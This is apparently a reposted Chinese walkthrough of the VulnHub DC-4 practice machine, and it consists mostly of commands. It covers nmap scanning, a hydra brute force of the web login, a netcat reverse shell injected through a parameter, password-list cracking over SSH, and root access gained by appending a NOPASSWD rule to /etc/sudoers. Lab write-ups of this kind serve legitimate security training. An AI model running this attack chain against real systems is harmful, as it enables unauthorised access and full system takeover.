赞
踩
https://www.vulnhub.com/entry/dc-4,313/
- # 使用命令
- nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:43:49:A5"
- # 使用命令
- nmap 192.168.145.217 -p- -sV
- # 使用命令
- whatweb "http://192.168.145.217"
- # 使用命令
- dirsearch -u "http://192.168.145.217"
admin:happy
- # 使用命令
- hydra -l admin -P rockyou.txt 192.168.145.217 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
-
- -l admin:指定用户名为 admin。
- -P rockyou.txt:指定密码字典为当前目录下的 rockyou.txt。
- 192.168.1.165:指定要攻击的服务器 IP 地址。
- http-post-form:指定使用 HTTP POST 请求方式。
- "/login.php:username=^USER^&password=^PASS^:S=logout":指定登录页面地址 /login.php,并使用 username 和 password 作为参数名来传递用户名和密码。其中 ^USER^ 和 ^PASS^ 含义为在暴力破解过程之中将要用到的用户名和密码,而 :S=logout 则是指当程序返回值为 logout 时,认为破解成功并退出程序。
- -F:如果成功的话,停止猜测其他密码。
- # 使用命令
- nc+-e/bin/bash+192.168.145.213+1234
-
- # 监听
- nc -lvnp 1234
- # 使用命令
- python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l
命令查看可执行的命令,发现需要密码jim
目录下有密码字典hydra
进行破解- # 靶机开启临时服务
- python3 -m http.server
-
- # kali下载
- wget http://192.168.145.217:8000/old-passwords.bak
-
- # hydra爆破
- hydra -l jim -P old-passwords.bak ssh://192.168.145.217
- # 使用命令
- ssh jim@192.168.145.217
charles:^xHhA&hvim0y
- # 使用命令
- cd /var/mail
- cat jim
- # 使用命令
- su charles
sudo -l
查看可执行命令- # 使用命令
- echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
- sudo su
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。